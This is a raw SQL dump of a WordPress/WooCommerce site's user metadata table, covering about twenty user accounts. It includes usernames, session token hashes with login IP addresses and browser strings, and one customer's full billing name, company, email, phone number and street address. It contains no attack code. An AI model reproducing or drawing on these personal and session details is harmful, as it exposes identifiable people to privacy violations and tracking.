INSERT INTO `wp_usermeta` VALUES (20767, 1399, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (20768, 1399, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (20769, 1399, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (20770, 1399, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (20771, 1399, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (20772, 1399, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (20773, 1399, '_yoast_wpseo_profile_updated', '1498535119'); 
INSERT INTO `wp_usermeta` VALUES (20774, 1399, 'session_tokens', 'a:1:{s:64:"3ca65cccc982a004c1f3b54ca5d23efefec5c5f8d443e7ec372dff18abb7b7bd";a:4:{s:10:"expiration";i:1499744728;s:2:"ip";s:12:"42.61.75.178";s:2:"ua";s:129:"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063";s:5:"login";i:1498535128;}}'); 
INSERT INTO `wp_usermeta` VALUES (20775, 1399, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (20776, 1400, 'nickname', 'vanessa.peckinpaugh'); 
INSERT INTO `wp_usermeta` VALUES (20777, 1400, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (20778, 1400, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (20779, 1400, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (20780, 1400, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (20781, 1400, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (20782, 1400, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (20783, 1400, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (20784, 1400, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (20785, 1400, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (20786, 1400, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (20787, 1400, '_yoast_wpseo_profile_updated', '1498572621'); 
INSERT INTO `wp_usermeta` VALUES (20788, 1400, 'session_tokens', 'a:1:{s:64:"70e13690a365c11a3630930ebbadbfd429e7a8a67a62eb8a80a282b66b2e68bf";a:4:{s:10:"expiration";i:1499782229;s:2:"ip";s:13:"165.156.39.32";s:2:"ua";s:114:"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36";s:5:"login";i:1498572629;}}'); 
INSERT INTO `wp_usermeta` VALUES (20789, 1401, 'nickname', 'wgaudreau'); 
INSERT INTO `wp_usermeta` VALUES (20790, 1401, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (20791, 1401, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (20792, 1401, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (20793, 1401, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (20794, 1401, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (20795, 1401, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (20796, 1401, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (20797, 1401, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (20798, 1401, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (20799, 1401, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (20800, 1401, '_yoast_wpseo_profile_updated', '1498579388'); 
INSERT INTO `wp_usermeta` VALUES (20801, 1401, 'session_tokens', 'a:1:{s:64:"4559a87b4f8af3445e13ae149c60a43891964b94d349ef43c950231a74a19915";a:4:{s:10:"expiration";i:1499788996;s:2:"ip";s:13:"96.233.62.210";s:2:"ua";s:114:"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36";s:5:"login";i:1498579396;}}'); 
INSERT INTO `wp_usermeta` VALUES (20803, 1402, 'nickname', 'mitchellhenson'); 
INSERT INTO `wp_usermeta` VALUES (20804, 1402, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (20805, 1402, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (20806, 1402, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (20807, 1402, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (20808, 1402, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (20809, 1402, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (20810, 1402, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (20811, 1402, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (20812, 1402, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (20813, 1402, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (20814, 1402, '_yoast_wpseo_profile_updated', '1498586064'); 
INSERT INTO `wp_usermeta` VALUES (20815, 1402, 'session_tokens', 'a:1:{s:64:"63c068fda161d39f9b4fca2cc92d9fff6e3dbbc01a3364a525a6357cc4b575d5";a:4:{s:10:"expiration";i:1499795673;s:2:"ip";s:14:"192.104.67.121";s:2:"ua";s:114:"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36";s:5:"login";i:1498586073;}}'); 
INSERT INTO `wp_usermeta` VALUES (20816, 1403, 'nickname', 'RMorgan'); 
INSERT INTO `wp_usermeta` VALUES (20817, 1403, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (20818, 1403, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (20819, 1403, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (20820, 1403, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (20821, 1403, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (20822, 1403, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (20823, 1403, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (20824, 1403, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (20825, 1403, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (20826, 1403, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (20827, 1403, '_yoast_wpseo_profile_updated', '1498592872'); 
INSERT INTO `wp_usermeta` VALUES (20828, 1403, 'session_tokens', 'a:1:{s:64:"342d77273463fe429a32ea2940f82a891536d56987aa97f3bb61d89eae1912a9";a:4:{s:10:"expiration";i:1499802483;s:2:"ip";s:11:"68.99.74.35";s:2:"ua";s:127:"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2486.0 Safari/537.36 Edge/13.10586";s:5:"login";i:1498592883;}}'); 
INSERT INTO `wp_usermeta` VALUES (20829, 1404, 'nickname', 'sasan.akhondzadeh'); 
INSERT INTO `wp_usermeta` VALUES (20830, 1404, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (20831, 1404, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (20832, 1404, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (20833, 1404, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (20834, 1404, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (20835, 1404, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (20836, 1404, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (20837, 1404, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (20838, 1404, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (20839, 1404, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (20840, 1404, '_yoast_wpseo_profile_updated', '1498604404'); 
INSERT INTO `wp_usermeta` VALUES (20841, 1404, 'session_tokens', 'a:2:{s:64:"cf46826565123dc860b62e281a6b1d08daec1fa9bd5389a0cc89edd4aa043fd4";a:4:{s:10:"expiration";i:1499814021;s:2:"ip";s:12:"12.49.105.34";s:2:"ua";s:114:"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36";s:5:"login";i:1498604421;}s:64:"758a296aec6fde25b1d5f3a7cf7db251336fccc0e8a153154ad91be37aa8ec1c";a:4:{s:10:"expiration";i:1498777223;s:2:"ip";s:12:"12.49.105.34";s:2:"ua";s:114:"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36";s:5:"login";i:1498604423;}}'); 
INSERT INTO `wp_usermeta` VALUES (20842, 1404, 'billing_first_name', 'sasan'); 
INSERT INTO `wp_usermeta` VALUES (20843, 1404, 'billing_last_name', 'akhondzadeh'); 
INSERT INTO `wp_usermeta` VALUES (20844, 1404, 'billing_company', 'bacon adhesives'); 
INSERT INTO `wp_usermeta` VALUES (20845, 1404, 'billing_email', 'sasan.akhondzadeh@rascp.com'); 
INSERT INTO `wp_usermeta` VALUES (20846, 1404, 'billing_phone', '949-863-1499'); 
INSERT INTO `wp_usermeta` VALUES (20847, 1404, 'billing_country', 'US'); 
INSERT INTO `wp_usermeta` VALUES (20848, 1404, 'billing_address_1', '16731 hale avenue'); 
INSERT INTO `wp_usermeta` VALUES (20849, 1404, 'billing_address_2', ''); 
INSERT INTO `wp_usermeta` VALUES (20850, 1404, 'billing_city', 'irvine'); 
INSERT INTO `wp_usermeta` VALUES (20851, 1404, 'billing_state', 'CA'); 
INSERT INTO `wp_usermeta` VALUES (20852, 1404, 'billing_postcode', '92606'); 
INSERT INTO `wp_usermeta` VALUES (20853, 1404, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (20854, 1405, 'nickname', 'smith.s'); 
INSERT INTO `wp_usermeta` VALUES (20855, 1405, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (20856, 1405, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (20857, 1405, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (20858, 1405, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (20859, 1405, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (20860, 1405, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (20861, 1405, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (20862, 1405, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (20863, 1405, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (20864, 1405, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (20865, 1405, '_yoast_wpseo_profile_updated', '1498626263'); 
INSERT INTO `wp_usermeta` VALUES (20866, 1405, 'session_tokens', 'a:1:{s:64:"9318b001af3c9a38ca52710383c0d6f6e440532b63e27ca4f362cf0a2653fe56";a:4:{s:10:"expiration";i:1499835872;s:2:"ip";s:13:"121.243.44.34";s:2:"ua";s:65:"Mozilla/5.0 (Windows NT 5.1; rv:52.0) Gecko/20100101 Firefox/52.0";s:5:"login";i:1498626272;}}'); 
INSERT INTO `wp_usermeta` VALUES (20867, 1406, 'nickname', 'teresa42611982'); 
INSERT INTO `wp_usermeta` VALUES (20868, 1406, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (20869, 1406, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (20870, 1406, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (20871, 1406, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (20872, 1406, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (20873, 1406, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (20874, 1406, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (20875, 1406, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (20876, 1406, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (20877, 1406, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (20878, 1406, '_yoast_wpseo_profile_updated', '1498646668'); 
INSERT INTO `wp_usermeta` VALUES (20879, 1406, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (20880, 1407, 'nickname', 'lima63952006'); 
INSERT INTO `wp_usermeta` VALUES (20881, 1407, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (20882, 1407, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (20883, 1407, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (20884, 1407, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (20885, 1407, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (20886, 1407, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (20887, 1407, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (20888, 1407, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (20889, 1407, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (20890, 1407, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (20891, 1407, '_yoast_wpseo_profile_updated', '1498648247'); 
INSERT INTO `wp_usermeta` VALUES (20892, 1407, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (20893, 1408, 'nickname', 'silke.ouzkit2007'); 
INSERT INTO `wp_usermeta` VALUES (20894, 1408, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (20895, 1408, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (20896, 1408, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (20897, 1408, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (20898, 1408, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (20899, 1408, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (20900, 1408, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (20901, 1408, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (20902, 1408, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (20903, 1408, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (20904, 1408, '_yoast_wpseo_profile_updated', '1498651387'); 
INSERT INTO `wp_usermeta` VALUES (20905, 1408, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (20906, 1409, 'nickname', 'julie.filips'); 
INSERT INTO `wp_usermeta` VALUES (20907, 1409, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (20908, 1409, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (20909, 1409, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (20910, 1409, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (20911, 1409, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (20912, 1409, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (20913, 1409, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (20914, 1409, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (20915, 1409, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (20916, 1409, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (20917, 1409, '_yoast_wpseo_profile_updated', '1498656444'); 
INSERT INTO `wp_usermeta` VALUES (20918, 1409, 'session_tokens', 'a:1:{s:64:"781f7eb5ba406d879f17986d17b96e8d275b89cb72448e147540c3b59c5d6c83";a:4:{s:10:"expiration";i:1499866052;s:2:"ip";s:14:"76.195.112.218";s:2:"ua";s:68:"Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1498656452;}}'); 
INSERT INTO `wp_usermeta` VALUES (20919, 1410, 'nickname', 'alexispappas12071954'); 
INSERT INTO `wp_usermeta` VALUES (20920, 1410, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (20921, 1410, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (20922, 1410, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (20923, 1410, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (20924, 1410, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (20925, 1410, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (20926, 1410, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (20927, 1410, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (20928, 1410, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (20929, 1410, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (20930, 1410, '_yoast_wpseo_profile_updated', '1498661915'); 
INSERT INTO `wp_usermeta` VALUES (20931, 1410, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (20932, 1411, 'nickname', 'andersonbernadette1957'); 
INSERT INTO `wp_usermeta` VALUES (20933, 1411, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (20934, 1411, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (20935, 1411, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (20936, 1411, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (20937, 1411, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (20938, 1411, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (20939, 1411, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (20940, 1411, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (20941, 1411, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (20942, 1411, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (20943, 1411, '_yoast_wpseo_profile_updated', '1498663208'); 
INSERT INTO `wp_usermeta` VALUES (20944, 1411, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (20945, 1412, 'nickname', 'brian2sshi2003'); 
INSERT INTO `wp_usermeta` VALUES (20946, 1412, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (20947, 1412, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (20948, 1412, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (20949, 1412, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (20950, 1412, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (20951, 1412, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (20952, 1412, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (20953, 1412, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (20954, 1412, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (20955, 1412, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (20956, 1412, '_yoast_wpseo_profile_updated', '1498664653'); 
INSERT INTO `wp_usermeta` VALUES (20957, 1412, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (20958, 1413, 'nickname', 'melissa.perjak'); 
INSERT INTO `wp_usermeta` VALUES (20959, 1413, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (20960, 1413, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (20961, 1413, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (20962, 1413, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (20963, 1413, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (20964, 1413, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (20965, 1413, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (20966, 1413, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (20967, 1413, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (20968, 1413, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (20969, 1413, '_yoast_wpseo_profile_updated', '1498670275'); 
INSERT INTO `wp_usermeta` VALUES (20970, 1413, 'session_tokens', 'a:1:{s:64:"07a7123d19234cf5419a42aa54b68c9a404e01d4d3f1f900faa865df86012765";a:4:{s:10:"expiration";i:1499879884;s:2:"ip";s:12:"131.46.41.74";s:2:"ua";s:61:"Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1498670284;}}'); 
INSERT INTO `wp_usermeta` VALUES (20971, 1414, 'nickname', 'klint.cardinal'); 
INSERT INTO `wp_usermeta` VALUES (20972, 1414, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (20973, 1414, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (20974, 1414, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (20975, 1414, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (20976, 1414, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (20977, 1414, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (20978, 1414, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (20979, 1414, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (20980, 1414, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (20981, 1414, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (20982, 1414, '_yoast_wpseo_profile_updated', '1498670577'); 
INSERT INTO `wp_usermeta` VALUES (20983, 1414, 'session_tokens', 'a:1:{s:64:"07aaa31e2afd67cf84099e751c6e0e50e6bb40d7503826dd552641b8504a485e";a:4:{s:10:"expiration";i:1499880187;s:2:"ip";s:14:"129.123.197.35";s:2:"ua";s:113:"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36";s:5:"login";i:1498670587;}}'); 
INSERT INTO `wp_usermeta` VALUES (20985, 1415, 'nickname', 'valkimacri1967'); 
INSERT INTO `wp_usermeta` VALUES (20986, 1415, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (20987, 1415, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (20988, 1415, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (20989, 1415, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (20990, 1415, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (20991, 1415, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (20992, 1415, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (20993, 1415, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (20994, 1415, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (20995, 1415, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (20996, 1415, '_yoast_wpseo_profile_updated', '1498678130'); 
INSERT INTO `wp_usermeta` VALUES (20997, 1415, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (20998, 1416, 'nickname', 'mandicohen1953'); 
INSERT INTO `wp_usermeta` VALUES (20999, 1416, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (21000, 1416, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (21001, 1416, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (21002, 1416, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (21003, 1416, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (21004, 1416, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (21005, 1416, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (21006, 1416, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (21007, 1416, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (21008, 1416, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (21009, 1416, '_yoast_wpseo_profile_updated', '1498698759'); 
INSERT INTO `wp_usermeta` VALUES (21010, 1416, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (21011, 1417, 'nickname', 'mandalyn551968'); 
INSERT INTO `wp_usermeta` VALUES (21012, 1417, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (21013, 1417, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (21014, 1417, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (21015, 1417, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (21016, 1417, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (21017, 1417, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (21018, 1417, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (21019, 1417, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (21020, 1417, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (21021, 1417, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (21022, 1417, '_yoast_wpseo_profile_updated', '1498701364'); 
INSERT INTO `wp_usermeta` VALUES (21023, 1417, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (21024, 1418, 'nickname', 'kcosta'); 
INSERT INTO `wp_usermeta` VALUES (21025, 1418, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (21026, 1418, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (21027, 1418, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (21028, 1418, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (21029, 1418, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (21030, 1418, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (21031, 1418, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (21032, 1418, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (21033, 1418, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (21034, 1418, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (21035, 1418, '_yoast_wpseo_profile_updated', '1498713498'); 
INSERT INTO `wp_usermeta` VALUES (21036, 1418, 'session_tokens', 'a:1:{s:64:"b9c93247a9a75acf4d3bb2dc23c71374c045e809fcb322574485ac8fe40b314a";a:4:{s:10:"expiration";i:1500450378;s:2:"ip";s:12:"182.71.39.42";s:2:"ua";s:102:"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36";s:5:"login";i:1500277578;}}'); 
INSERT INTO `wp_usermeta` VALUES (21037, 1419, 'nickname', 'mshaykev'); 
INSERT INTO `wp_usermeta` VALUES (21038, 1419, 'first_name', 'Michael'); 
INSERT INTO `wp_usermeta` VALUES (21039, 1419, 'last_name', 'Shaykevich'); 
INSERT INTO `wp_usermeta` VALUES (21040, 1419, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (21041, 1419, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (21042, 1419, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (21043, 1419, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (21044, 1419, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (21045, 1419, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (21046, 1419, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (21047, 1419, 'wp_user_level', '0'); 
